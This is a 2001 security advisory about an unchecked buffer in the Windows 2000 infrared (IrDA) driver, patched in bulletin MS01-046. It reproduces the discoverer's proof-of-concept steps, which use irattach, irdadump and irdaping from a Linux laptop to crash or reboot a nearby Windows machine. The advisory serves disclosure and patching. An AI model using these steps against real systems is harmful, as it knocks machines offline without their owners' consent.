Reported August 21, 2001, by Microsoft.

VERSION AFFECTED

·         Windows 2000

 

DESCRIPTION
An unchecked buffer exists in the Infrared Data Association (IrDA) driver that can cause a Denial of Service (DoS) condition. A system running Win2K with infrared support turned on can crash when it receives an IrDA test frame from a Linux system that is using the irdaping utility.

 

DEMONSTRATION

Paul Millar, who discovered the vulnerability, posted the following scenario as proof-of-concept:

 

Recreate:

  1. Startup laptops. My setup was: victim running Windows, protagonist

     running GNU/Linux. The Linux kernel must have IrDA support

     compiled in.

  2. Under GNU/Linux, make sure irda-utils-0.9.10-9 is installed, other

     versions are untested, but will probably work too.

  3. Do "irattach /dev/ttyS1 -s" or equivalent to activate the IrDA

     port.

  4. Check the GNU/Linux side its working correctly by running the

     "irdadump" command. You should see repetitive output similar to:

 

07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)

07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)

07:28:17.970845 xid:cmd 4d274896 > ffffffff S=6 s=2 (14)

07:28:18.060858 xid:cmd 4d274896 > ffffffff S=6 s=3 (14)

07:28:18.150840 xid:cmd 4d274896 > ffffffff S=6 s=4 (14)

07:28:18.240861 xid:cmd 4d274896 > ffffffff S=6 s=5 (14)

07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 \[ Computer \] (28)

 

  5. Place laptops so the infrared ports are aligned and within IrDA

     distance, irdadump should reflect new machine. The Windows

     machine should also respond, usually by making a sound.

  6. Run irdaping. The destination address ("0x4d274896"

     for above example) is required, but actual value doesn't matter.

 

The vulnerable system at this point will either crash with a blue screen or will reboot, depending upon the system’s configuration.

 

 

VENDOR RESPONSE

The vendor, Microsoft, has released security bulletin MS01-046 to address this vulnerability and recommends that affected users apply the patch mentioned in the bulletin.

 

CREDIT
Discovered by Paul Millar.